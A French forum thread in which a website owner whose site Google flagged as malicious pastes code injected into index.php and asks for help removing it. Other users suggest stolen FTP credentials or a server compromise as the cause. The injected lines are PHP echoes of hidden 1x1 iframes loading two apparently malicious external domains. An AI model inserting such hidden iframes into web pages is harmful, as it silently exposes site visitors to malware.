Discussion :

[Promise]

Salut tout le monde,

J'ai créé un site web qui est entre temps déclaré par google comme site malveillant. Après avoir téléchargé tous mes fichiers du site, j'ai rencontré des lignes de code bizarres insérées dans ma page index.php. J'aimerais savoir s'il y a une méthode de sécurité pour empêcher l'insertion de ces lignes de codes dans mes pages.

Voici les lignes de code insérées :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

echo "<iframe src=\"http://internetcountercheck.com/?click=37179046\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";  echo "<iframe src=\"http://deisvop.net/?click=44C28\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Ces lignes sont insérées dans ma page index.php de cette façon :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 
<?php 
 
            if(isset($_GET['theme'])){
            $variable=$_GET['theme'];
            switch($variable){
            case 'presentation': include("presentation.php");break;
		    case 'chantiers': include("chantiers.php");break;
            case 'stages': include("stages.php");break;
		    case 'projets': include("projets.php");break;
            case 'galerie': include("galerie.php");break;
            case 'contacts': include("contacts.php");break;
            case 'treat': include("traitement.php");break;
			case 'cn': include("espace.php");break;
			case 'ad': include("administrator.php");break;
			default:  include("accueil.php");
	      }
 
		}else{ 
		      include("accueil.php");
		      }
          echo "<iframe src=\"http://internetcountercheck.com/?click=37179046\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";  echo "<iframe src=\"http://deisvop.net/?click=44C28\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; 
 
?>

Ce serait un plaisir pour moi de trouver de vous une solution à ce problème.

[ash_le_parisien]

vu que c'est dans le code source, c'est quelqu'un qui t'a pirater ton acces ftp OU ton serveur (selon comment il est hébergé) !

à mon avis tu devrais plus te diriger dans cette direction.. moi je n'y connais rien en sécurité ftp ou serveur etc désolé !

[Vil'Coyote]

salut,
en terme de "sécurité" tu l'utilisation de htacss qui permet de limiter pas mal de chose après en fonction du langage utilisé il y a différente méthodes à utiliser ou prendre en compte.

[sabotage]

Comme l'a dit ash, il s'agit
- soit d'un virus qui infecte ton poste (ou n'importe quel poste qui accèderait aux fichiers du serveur) et qui modifie tes fichiers ou transmet ton mot de passe.
- soit d'une attaque directe sur le serveur.

Il n'y a rien à faire contre ça au niveau PHP.

[Promise]

Comme l'a dit ash, il s'agit
- soit d'un virus qui infecte ton poste (ou n'importe quel poste qui accèderait aux fichiers du serveur) et qui modifie tes fichiers ou transmet ton mot de passe.
- soit d'une attaque directe sur le serveur.

Il n'y a rien à faire contre ça au niveau PHP.

Merci pour vos différents apports à ce sujet. Je pensais qu'il y a un moyen d'écrire un script pour enlever ces lignes de code à chaque insertion.

[Promise]

Ce que je veux dire un script en PHP qui parcourt les fichiers et supprime à chaque fois qu'il trouve ces lignes de code bizarres.

[ash_le_parisien]

Tu faire un script dit "réparateur" au cas où le problème ne soit pas que sur un seul fichier et que tu puisse tout supprimer sans devoir y jeter un coup d'œil, c'est bien ça ?

[Promise]

Tu faire un script dit "réparateur" au cas où le problème ne soit pas que sur un seul fichier et que tu puisse tout supprimer sans devoir y jeter un coup d'œil, c'est bien ça ?

Oui, c'est bien ça ash_le_parisien. Comment le faire? Merci.